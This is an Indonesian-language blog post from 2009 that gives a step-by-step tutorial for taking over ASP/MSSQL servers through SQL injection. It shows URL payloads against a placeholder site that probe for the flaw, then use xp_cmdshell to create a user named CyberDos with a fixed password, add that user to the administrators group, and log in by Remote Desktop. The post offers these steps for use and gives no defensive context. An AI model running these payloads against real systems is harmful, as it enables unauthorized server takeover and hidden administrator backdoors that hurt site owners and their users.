Sabtu, 05 Desember 2009
ini tentang bagaimana caranya rooting (ambil alih/remote desktop) server via sql injection (asp seh..hehehe..)
tapi maaf yaa..cuma bisa kasih tutorial’a doang.. 1
yang harus dilakukan :
1. cari website yang vuln (asp)
contoh : http://target.com/bego.asp?id=27
2. kita cek vuln’a seperti ini
contoh : http://target.com/bego.asp?id=convert(int,(select+user));–
klo errornya seperti ini
Syntax error converting blablabla value ‘dbo‘ to a column of data type int.
perhatiin yang diberi warna merah itu..klo ada tulisan seperti itu,,kita lanjut..klo tidak?? ya cebok 10
3. lalu lanjutkan seperti ini neh exploitnya.. 4
contoh : http://target.com/bego.asp?id=27;exec%20master..xp_cmdshell’net user CyberDos cyborg /add’;–
fungsinya? tuk membuat account baru pada desktop target dengan username CyberDos dan password cyborg
4. langkah sebelum terakhir
contoh : http://target.com/bego.asp?id=27;exec%20master..xp_cmdshell ‘net localgroup administrators CyberDos /add’;–
fungsinya? tuk menjadikan account kita menjadi administrator di dekstop target 4
5. ya tinggal gunain Remote Desktop deh dengan acc dan pass masing2 juga 4
Sumber : http://www.cyberdos.org
0 komentar:
:)) :)] ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* :| 8-} ~x( :-t b-( :-L x( =))
Posting Komentar